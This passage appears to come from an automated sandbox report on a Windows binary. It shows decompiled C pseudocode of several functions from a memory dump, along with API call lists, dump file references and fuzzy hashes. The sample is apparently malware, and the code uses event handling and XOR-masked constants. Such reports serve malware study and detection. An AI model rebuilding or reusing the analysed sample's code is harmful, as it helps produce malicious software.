                                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					goto L4;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				goto L4;
                                                                                                                                                                                                                        			}





















                                                                                                                                                                                                                        0x026f4d8f
                                                                                                                                                                                                                        0x026f4d9b
                                                                                                                                                                                                                        0x026f4da1
                                                                                                                                                                                                                        0x026f4da6
                                                                                                                                                                                                                        0x026f4daa
                                                                                                                                                                                                                        0x026f4f07
                                                                                                                                                                                                                        0x026f4f0b
                                                                                                                                                                                                                        0x026f4f0b
                                                                                                                                                                                                                        0x026f4db0
                                                                                                                                                                                                                        0x026f4db4
                                                                                                                                                                                                                        0x026f4db8
                                                                                                                                                                                                                        0x026f4dbb
                                                                                                                                                                                                                        0x026f4dc6
                                                                                                                                                                                                                        0x026f4dcc
                                                                                                                                                                                                                        0x026f4dd1
                                                                                                                                                                                                                        0x026f4dd4
                                                                                                                                                                                                                        0x026f4dee
                                                                                                                                                                                                                        0x026f4dfa
                                                                                                                                                                                                                        0x026f4e03
                                                                                                                                                                                                                        0x026f4e0d
                                                                                                                                                                                                                        0x026f4e12
                                                                                                                                                                                                                        0x026f4e14
                                                                                                                                                                                                                        0x026f4e17
                                                                                                                                                                                                                        0x026f4ec5
                                                                                                                                                                                                                        0x026f4ecb
                                                                                                                                                                                                                        0x026f4edc
                                                                                                                                                                                                                        0x026f4eef
                                                                                                                                                                                                                        0x026f4eff
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f4f04
                                                                                                                                                                                                                        0x026f4e20
                                                                                                                                                                                                                        0x026f4e27
                                                                                                                                                                                                                        0x026f4e2b
                                                                                                                                                                                                                        0x026f4e31
                                                                                                                                                                                                                        0x026f4e33
                                                                                                                                                                                                                        0x026f4e35
                                                                                                                                                                                                                        0x026f4e37
                                                                                                                                                                                                                        0x026f4e39
                                                                                                                                                                                                                        0x026f4e43
                                                                                                                                                                                                                        0x026f4e48
                                                                                                                                                                                                                        0x026f4e4a
                                                                                                                                                                                                                        0x026f4e4c
                                                                                                                                                                                                                        0x026f4e4d
                                                                                                                                                                                                                        0x026f4e4e
                                                                                                                                                                                                                        0x026f4e4f
                                                                                                                                                                                                                        0x026f4e56
                                                                                                                                                                                                                        0x026f4e5d
                                                                                                                                                                                                                        0x026f4e60
                                                                                                                                                                                                                        0x026f4e60
                                                                                                                                                                                                                        0x026f4e2d
                                                                                                                                                                                                                        0x026f4e2d
                                                                                                                                                                                                                        0x026f4e2d
                                                                                                                                                                                                                        0x026f4e68
                                                                                                                                                                                                                        0x026f4e70
                                                                                                                                                                                                                        0x026f4e79
                                                                                                                                                                                                                        0x026f4e7e
                                                                                                                                                                                                                        0x026f4e7e
                                                                                                                                                                                                                        0x026f4e83
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f4e85
                                                                                                                                                                                                                        0x026f4e88
                                                                                                                                                                                                                        0x026f4e92
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f4e94
                                                                                                                                                                                                                        0x026f4e94
                                                                                                                                                                                                                        0x026f4e9e
                                                                                                                                                                                                                        0x026f4e7e
                                                                                                                                                                                                                        0x026f4e83
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f4e83
                                                                                                                                                                                                                        0x026f4ea8
                                                                                                                                                                                                                        0x026f4eab
                                                                                                                                                                                                                        0x026f4eae
                                                                                                                                                                                                                        0x026f4eb5
                                                                                                                                                                                                                        0x026f4eb5
                                                                                                                                                                                                                        0x026f4ec2
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f4ec2
                                                                                                                                                                                                                        0x026f4dbd
                                                                                                                                                                                                                        0x026f4dc1
                                                                                                                                                                                                                        0x026f4dc2
                                                                                                                                                                                                                        0x026f4dc4
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f4dc4
                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 026F4E39
                                                                                                                                                                                                                        • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 026F4E4F
                                                                                                                                                                                                                        • memset.NTDLL ref: 026F4EEF
                                                                                                                                                                                                                        • memset.NTDLL ref: 026F4EFF
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: memset$_allmul_aulldiv
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3041852380-0
                                                                                                                                                                                                                        • Opcode ID: 70bba6e425ec7155728d21d3f3d897b57527b775b2005c8045f0ddbb886f930a
                                                                                                                                                                                                                        • Instruction ID: c3ab480f25a9d6a67ba393809e2368c5fb7c2faef1ad20a91455119d5c87322f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 70bba6e425ec7155728d21d3f3d897b57527b775b2005c8045f0ddbb886f930a
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1B418072A00259ABDF50DEA8CC40BDF7769EF45310F008569AB19A7284EB70AE55CF94
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • lstrlen.KERNEL32(?,00000008,73B74D40), ref: 026FA78C
                                                                                                                                                                                                                          • Part of subcall function 026F6D10: RtlAllocateHeap.NTDLL(00000000,-00000008,026F5D29), ref: 026F6D1C
                                                                                                                                                                                                                        • ResetEvent.KERNEL32(?), ref: 026FA800
                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 026FA823
                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 026FA8CE
                                                                                                                                                                                                                          • Part of subcall function 026F45B3: HeapFree.KERNEL32(00000000,00000000,026F5DE9,00000000,?,?,-00000008), ref: 026F45BF
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 943265810-0
                                                                                                                                                                                                                        • Opcode ID: f970c17a77cb8e508b8f00f7aa3611ef4db6769205b29f675bafc5102dd2af68
                                                                                                                                                                                                                        • Instruction ID: 7a068a1bc55defea2c53c0f387166940887c1d1e79c8e94fbb994f53c77b0338
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f970c17a77cb8e508b8f00f7aa3611ef4db6769205b29f675bafc5102dd2af68
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D1416D71940204BBDF719FA5CC88E9F7BBDEB89B04B100D29F716E1190D771A955CB60
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 42%
                                                                                                                                                                                                                        			E026F4597(void* __eax, void* __ecx) {
                                                                                                                                                                                                                        				char _v8;
                                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                                                        				intOrPtr _t38;
                                                                                                                                                                                                                        				intOrPtr* _t39;
                                                                                                                                                                                                                        				intOrPtr* _t41;
                                                                                                                                                                                                                        				void* _t54;
                                                                                                                                                                                                                        				long _t64;
                                                                                                                                                                                                                        				void* _t67;
                                                                                                                                                                                                                        				void* _t69;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t58 = __ecx;
                                                                                                                                                                                                                        				_t67 = __eax;
                                                                                                                                                                                                                        				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                                                                                                                                                                                                                        					L2:
                                                                                                                                                                                                                        					_t30 = _t67;
                                                                                                                                                                                                                        					_pop(_t68);
                                                                                                                                                                                                                        					_t69 = _t30;
                                                                                                                                                                                                                        					_t64 = 0;
                                                                                                                                                                                                                        					ResetEvent( *(_t69 + 0x1c));
                                                                                                                                                                                                                        					_push( &_v8);
                                                                                                                                                                                                                        					_push(4);
                                                                                                                                                                                                                        					_push( &_v20);
                                                                                                                                                                                                                        					_push( *((intOrPtr*)(_t69 + 0x18)));
                                                                                                                                                                                                                        					if( *0x26fd138() != 0) {
                                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                                        						if(_v8 == 0) {
                                                                                                                                                                                                                        							 *((intOrPtr*)(_t69 + 0x30)) = 0;
                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                        							 *0x26fd168(0, 1,  &_v12);
                                                                                                                                                                                                                        							if(0 != 0) {
                                                                                                                                                                                                                        								_t64 = 8;
                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                        								_t38 = E026F6D10(0x1000);
                                                                                                                                                                                                                        								_v16 = _t38;
                                                                                                                                                                                                                        								if(_t38 == 0) {
                                                                                                                                                                                                                        									_t64 = 8;
                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                        									_push(0);
                                                                                                                                                                                                                        									_push(_v8);
                                                                                                                                                                                                                        									_push( &_v20);
                                                                                                                                                                                                                        									while(1) {
                                                                                                                                                                                                                        										_t41 = _v12;
                                                                                                                                                                                                                        										_t61 =  *_t41;
                                                                                                                                                                                                                        										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
                                                                                                                                                                                                                        										ResetEvent( *(_t69 + 0x1c));
                                                                                                                                                                                                                        										_push( &_v8);
                                                                                                                                                                                                                        										_push(0x1000);
                                                                                                                                                                                                                        										_push(_v16);
                                                                                                                                                                                                                        										_push( *((intOrPtr*)(_t69 + 0x18)));
                                                                                                                                                                                                                        										if( *0x26fd138() != 0) {
                                                                                                                                                                                                                        											goto L17;
                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                        										_t64 = GetLastError();
                                                                                                                                                                                                                        										if(_t64 == 0x3e5) {
                                                                                                                                                                                                                        											_t64 = E026F5802( *(_t69 + 0x1c), _t61, 0xffffffff);
                                                                                                                                                                                                                        											if(_t64 == 0) {
                                                                                                                                                                                                                        												_t64 =  *((intOrPtr*)(_t69 + 0x28));
                                                                                                                                                                                                                        												if(_t64 == 0) {
                                                                                                                                                                                                                        													goto L17;
                                                                                                                                                                                                                        												}
                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                        										L19:
                                                                                                                                                                                                                        										E026F45B3(_v16);
                                                                                                                                                                                                                        										if(_t64 == 0) {
                                                                                                                                                                                                                        											_t64 = E026F6C55(_v12, _t69);
                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                        										goto L22;
                                                                                                                                                                                                                        										L17:
                                                                                                                                                                                                                        										_t64 = 0;
                                                                                                                                                                                                                        										if(_v8 != 0) {
                                                                                                                                                                                                                        											_push(0);
                                                                                                                                                                                                                        											_push(_v8);
                                                                                                                                                                                                                        											_push(_v16);
                                                                                                                                                                                                                        											continue;
                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                        										goto L19;
                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                        								L22:
                                                                                                                                                                                                                        								_t39 = _v12;
                                                                                                                                                                                                                        								 *((intOrPtr*)( *_t39 + 8))(_t39);
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                        						_t64 = GetLastError();
                                                                                                                                                                                                                        						if(_t64 != 0x3e5) {
                                                                                                                                                                                                                        							L8:
                                                                                                                                                                                                                        							if(_t64 == 0) {
                                                                                                                                                                                                                        								goto L9;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                        							_t64 = E026F5802( *(_t69 + 0x1c), _t58, 0xffffffff);
                                                                                                                                                                                                                        							if(_t64 == 0) {
                                                                                                                                                                                                                        								_t64 =  *((intOrPtr*)(_t69 + 0x28));
                                                                                                                                                                                                                        								goto L8;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					return _t64;
                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                        					_t54 = E026F4383(__ecx, __eax);
                                                                                                                                                                                                                        					if(_t54 != 0) {
                                                                                                                                                                                                                        						return _t54;
                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                        						goto L2;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        			}
















                                                                                                                                                                                                                        0x026f4597
                                                                                                                                                                                                                        0x026f4598
                                                                                                                                                                                                                        0x026f459e
                                                                                                                                                                                                                        0x026f45a9
                                                                                                                                                                                                                        0x026f45a9
                                                                                                                                                                                                                        0x026f45ab
                                                                                                                                                                                                                        0x026f5a53
                                                                                                                                                                                                                        0x026f5a58
                                                                                                                                                                                                                        0x026f5a5a
                                                                                                                                                                                                                        0x026f5a5f
                                                                                                                                                                                                                        0x026f5a60
                                                                                                                                                                                                                        0x026f5a65
                                                                                                                                                                                                                        0x026f5a66
                                                                                                                                                                                                                        0x026f5a71
                                                                                                                                                                                                                        0x026f5aa2
                                                                                                                                                                                                                        0x026f5aa7
                                                                                                                                                                                                                        0x026f5b6a
                                                                                                                                                                                                                        0x026f5aad
                                                                                                                                                                                                                        0x026f5ab4
                                                                                                                                                                                                                        0x026f5abc
                                                                                                                                                                                                                        0x026f5b67
                                                                                                                                                                                                                        0x026f5ac2
                                                                                                                                                                                                                        0x026f5ac7
                                                                                                                                                                                                                        0x026f5acc
                                                                                                                                                                                                                        0x026f5ad1
                                                                                                                                                                                                                        0x026f5b59
                                                                                                                                                                                                                        0x026f5ad7
                                                                                                                                                                                                                        0x026f5ad7
                                                                                                                                                                                                                        0x026f5ad9
                                                                                                                                                                                                                        0x026f5adf
                                                                                                                                                                                                                        0x026f5ae0
                                                                                                                                                                                                                        0x026f5ae0
                                                                                                                                                                                                                        0x026f5ae3
                                                                                                                                                                                                                        0x026f5ae6
                                                                                                                                                                                                                        0x026f5aec
                                                                                                                                                                                                                        0x026f5af1
                                                                                                                                                                                                                        0x026f5af2
                                                                                                                                                                                                                        0x026f5af7
                                                                                                                                                                                                                        0x026f5afa
                                                                                                                                                                                                                        0x026f5b05
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f5b0d
                                                                                                                                                                                                                        0x026f5b15
                                                                                                                                                                                                                        0x026f5b21
                                                                                                                                                                                                                        0x026f5b25
                                                                                                                                                                                                                        0x026f5b27
                                                                                                                                                                                                                        0x026f5b2c
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f5b2c
                                                                                                                                                                                                                        0x026f5b25
                                                                                                                                                                                                                        0x026f5b3e
                                                                                                                                                                                                                        0x026f5b41
                                                                                                                                                                                                                        0x026f5b48
                                                                                                                                                                                                                        0x026f5b53
                                                                                                                                                                                                                        0x026f5b53
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f5b2e
                                                                                                                                                                                                                        0x026f5b2e
                                                                                                                                                                                                                        0x026f5b33
                                                                                                                                                                                                                        0x026f5b35
                                                                                                                                                                                                                        0x026f5b36
                                                                                                                                                                                                                        0x026f5b39
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f5b39
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f5b33
                                                                                                                                                                                                                        0x026f5ae0
                                                                                                                                                                                                                        0x026f5b5a
                                                                                                                                                                                                                        0x026f5b5a
                                                                                                                                                                                                                        0x026f5b60
                                                                                                                                                                                                                        0x026f5b60
                                                                                                                                                                                                                        0x026f5abc
                                                                                                                                                                                                                        0x026f5a73
                                                                                                                                                                                                                        0x026f5a79
                                                                                                                                                                                                                        0x026f5a81
                                                                                                                                                                                                                        0x026f5a9a
                                                                                                                                                                                                                        0x026f5a9c
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f5a83
                                                                                                                                                                                                                        0x026f5a8d
                                                                                                                                                                                                                        0x026f5a91
                                                                                                                                                                                                                        0x026f5a97
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f5a97
                                                                                                                                                                                                                        0x026f5a91
                                                                                                                                                                                                                        0x026f5a81
                                                                                                                                                                                                                        0x026f5b73
                                                                                                                                                                                                                        0x026f45a0
                                                                                                                                                                                                                        0x026f45a0
                                                                                                                                                                                                                        0x026f45a7
                                                                                                                                                                                                                        0x026f45b2
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f45a7

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,73BB81D0,00000000,00000000), ref: 026F5A5A
                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,026F896D,00000000,?,?), ref: 026F5A73
                                                                                                                                                                                                                        • ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,026F896D,00000000,?), ref: 026F5AEC
                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,026F896D,00000000,?,?), ref: 026F5B07
                                                                                                                                                                                                                          • Part of subcall function 026F4383: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,73BB81D0,00000000,00000000), ref: 026F439A
                                                                                                                                                                                                                          • Part of subcall function 026F4383: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,026F896D,00000000,?), ref: 026F43AA
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Event$ErrorLastReset$ObjectSingleWait
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1123145548-0
                                                                                                                                                                                                                        • Opcode ID: 49e67079655ce8d299b9a5023fdb3e65376085f822792fc265c4a4ce846752b0
                                                                                                                                                                                                                        • Instruction ID: 3ddd4b669f3b7516f0d14bf8318f426ce45eb1c65ff6075ace428c01d005295d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 49e67079655ce8d299b9a5023fdb3e65376085f822792fc265c4a4ce846752b0
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A2419472A00604AFCFA19BA5CC44FAE77B9EF84350F540569E753E7290EB70ED558B10
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 87%
                                                                                                                                                                                                                        			E026F8F5F(signed int _a4, signed int* _a8) {
                                                                                                                                                                                                                        				void* __ecx;
                                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                                        				signed int _t6;
                                                                                                                                                                                                                        				intOrPtr _t8;
                                                                                                                                                                                                                        				intOrPtr _t12;
                                                                                                                                                                                                                        				short* _t19;
                                                                                                                                                                                                                        				void* _t25;
                                                                                                                                                                                                                        				signed int* _t28;
                                                                                                                                                                                                                        				CHAR* _t30;
                                                                                                                                                                                                                        				long _t31;
                                                                                                                                                                                                                        				intOrPtr* _t32;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t6 =  *0x26fd270; // 0xd448b889
                                                                                                                                                                                                                        				_t32 = _a4;
                                                                                                                                                                                                                        				_a4 = _t6 ^ 0x109a6410;
                                                                                                                                                                                                                        				_t8 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        				_t3 = _t8 + 0x26fe836; // 0x61636f4c
                                                                                                                                                                                                                        				_t25 = 0;
                                                                                                                                                                                                                        				_t30 = E026F1C78(_t3, 1);
                                                                                                                                                                                                                        				if(_t30 != 0) {
                                                                                                                                                                                                                        					_t25 = CreateEventA(0x26fd2a8, 1, 0, _t30);
                                                                                                                                                                                                                        					E026F45B3(_t30);
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t12 =  *0x26fd25c; // 0x4000000a
                                                                                                                                                                                                                        				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E026F5946() != 0) {
                                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                                        					_t28 = _a8;
                                                                                                                                                                                                                        					if(_t28 != 0) {
                                                                                                                                                                                                                        						 *_t28 =  *_t28 | 0x00000001;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					_t31 = E026F49B7(_t32, 0);
                                                                                                                                                                                                                        					if(_t31 == 0 && _t25 != 0) {
                                                                                                                                                                                                                        						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					if(_t28 != 0 && _t31 != 0) {
                                                                                                                                                                                                                        						 *_t28 =  *_t28 & 0xfffffffe;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                        					_t19 =  *0x26fd110( *_t32, 0x20);
                                                                                                                                                                                                                        					if(_t19 != 0) {
                                                                                                                                                                                                                        						 *_t19 = 0;
                                                                                                                                                                                                                        						_t19 = _t19 + 2;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					_t31 = E026F5C56(0,  *_t32, _t19, 0);
                                                                                                                                                                                                                        					if(_t31 == 0) {
                                                                                                                                                                                                                        						if(_t25 == 0) {
                                                                                                                                                                                                                        							L22:
                                                                                                                                                                                                                        							return _t31;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                                                                                                                                                                                        						if(_t31 == 0) {
                                                                                                                                                                                                                        							L20:
                                                                                                                                                                                                                        							if(_t25 != 0) {
                                                                                                                                                                                                                        								CloseHandle(_t25);
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							goto L22;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        			}














                                                                                                                                                                                                                        0x026f8f60
                                                                                                                                                                                                                        0x026f8f67
                                                                                                                                                                                                                        0x026f8f71
                                                                                                                                                                                                                        0x026f8f75
                                                                                                                                                                                                                        0x026f8f7b
                                                                                                                                                                                                                        0x026f8f8a
                                                                                                                                                                                                                        0x026f8f91
                                                                                                                                                                                                                        0x026f8f95
                                                                                                                                                                                                                        0x026f8fa7
                                                                                                                                                                                                                        0x026f8fa9
                                                                                                                                                                                                                        0x026f8fa9
                                                                                                                                                                                                                        0x026f8fae
                                                                                                                                                                                                                        0x026f8fb5
                                                                                                                                                                                                                        0x026f900c
                                                                                                                                                                                                                        0x026f900c
                                                                                                                                                                                                                        0x026f9012
                                                                                                                                                                                                                        0x026f9014
                                                                                                                                                                                                                        0x026f9014
                                                                                                                                                                                                                        0x026f901e
                                                                                                                                                                                                                        0x026f9022
                                                                                                                                                                                                                        0x026f9034
                                                                                                                                                                                                                        0x026f9034
                                                                                                                                                                                                                        0x026f9038
                                                                                                                                                                                                                        0x026f903e
                                                                                                                                                                                                                        0x026f903e
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f8fce
                                                                                                                                                                                                                        0x026f8fd3
                                                                                                                                                                                                                        0x026f8fdb
                                                                                                                                                                                                                        0x026f8fdf
                                                                                                                                                                                                                        0x026f8fe3
                                                                                                                                                                                                                        0x026f8fe3
                                                                                                                                                                                                                        0x026f8ff0
                                                                                                                                                                                                                        0x026f8ff4
                                                                                                                                                                                                                        0x026f8ff8
                                                                                                                                                                                                                        0x026f904d
                                                                                                                                                                                                                        0x026f9053
                                                                                                                                                                                                                        0x026f9053
                                                                                                                                                                                                                        0x026f9006
                                                                                                                                                                                                                        0x026f900a
                                                                                                                                                                                                                        0x026f9041
                                                                                                                                                                                                                        0x026f9043
                                                                                                                                                                                                                        0x026f9046
                                                                                                                                                                                                                        0x026f9046
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f9043
                                                                                                                                                                                                                        0x026f900a
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f8ff4

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 026F1C78: lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,026F8594,74666F53,00000000,?,026FD00C,?,?), ref: 026F1CAE
                                                                                                                                                                                                                          • Part of subcall function 026F1C78: lstrcpy.KERNEL32(00000000,00000000), ref: 026F1CD2
                                                                                                                                                                                                                          • Part of subcall function 026F1C78: lstrcat.KERNEL32(00000000,00000000), ref: 026F1CDA
                                                                                                                                                                                                                        • CreateEventA.KERNEL32(026FD2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,026F8204,?,?,?), ref: 026F8FA0
                                                                                                                                                                                                                          • Part of subcall function 026F45B3: HeapFree.KERNEL32(00000000,00000000,026F5DE9,00000000,?,?,-00000008), ref: 026F45BF
                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,00004E20,026F8204,00000000,00000000,?,00000000,?,026F8204,?,?,?), ref: 026F9000
                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,026F8204,?,?,?), ref: 026F902E
                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,026F8204,?,?,?), ref: 026F9046
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 73268831-0
                                                                                                                                                                                                                        • Opcode ID: dda794282fec00eeb26d089eddc75b4796b6a1ccdf6e0cf92c1aa0fc58689342
                                                                                                                                                                                                                        • Instruction ID: da2b1af181b35d304d7a610ddace04641b6fcd6c7d9f04fa34f93407472557e6
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dda794282fec00eeb26d089eddc75b4796b6a1ccdf6e0cf92c1aa0fc58689342
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D8213632942390ABDFF16A6C8C84B1F739AFF94714B01061DFB16D7740DB21C8418A84
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 38%
                                                                                                                                                                                                                        			E026F4383(void* __ecx, void* __esi) {
                                                                                                                                                                                                                        				char _v8;
                                                                                                                                                                                                                        				long _v12;
                                                                                                                                                                                                                        				char _v16;
                                                                                                                                                                                                                        				long _v20;
                                                                                                                                                                                                                        				long _t34;
                                                                                                                                                                                                                        				long _t39;
                                                                                                                                                                                                                        				long _t42;
                                                                                                                                                                                                                        				long _t56;
                                                                                                                                                                                                                        				intOrPtr _t58;
                                                                                                                                                                                                                        				void* _t59;
                                                                                                                                                                                                                        				intOrPtr* _t60;
